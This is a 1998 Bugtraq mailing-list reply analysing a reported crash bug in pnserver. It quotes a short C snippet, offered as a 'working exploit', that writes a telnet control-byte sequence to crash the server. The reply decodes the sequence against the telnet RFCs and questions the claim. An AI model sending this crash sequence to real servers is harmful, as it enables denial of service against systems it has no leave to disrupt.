Bugtraq mailing list archives
Re: pnserver exploit..
From: mouse () RODENTS MONTREAL QC CA (der Mouse)
Date: Fri, 16 Jan 1998 14:59:53 -0500
It seems that the pnserver bug was different than first thought. The telnet client sends 6 characters that crash the server when its own maxbuffer is reached. Here is a working exploit.
sprintf(buffer, "%c%c%c%c%c", 255, 244, 255, 253, 6); write(sock, &buffer[0], strlen(buffer));
(Um, that's only 5 characters.) Hmmm. In telnet terms, IAC IP IAC DO TIMING-MARK. (See RFCs 854 and 860 for more.) What telnet client is this? Not to imply that pnserver is not wrong to crash, but this looks like a somewhat weird thing for a telnet client to send - or have I missed part of the discussion? This would make sense if the telnet client generated it in response to something like a terminal interrupt character. der Mouse mouse () rodents montreal qc ca 7D C8 61 52 5D E7 2D 39 4E F1 31 3E E8 B3 27 4B
Current thread:
- Re: pnserver exploit.. der Mouse (Jan 16)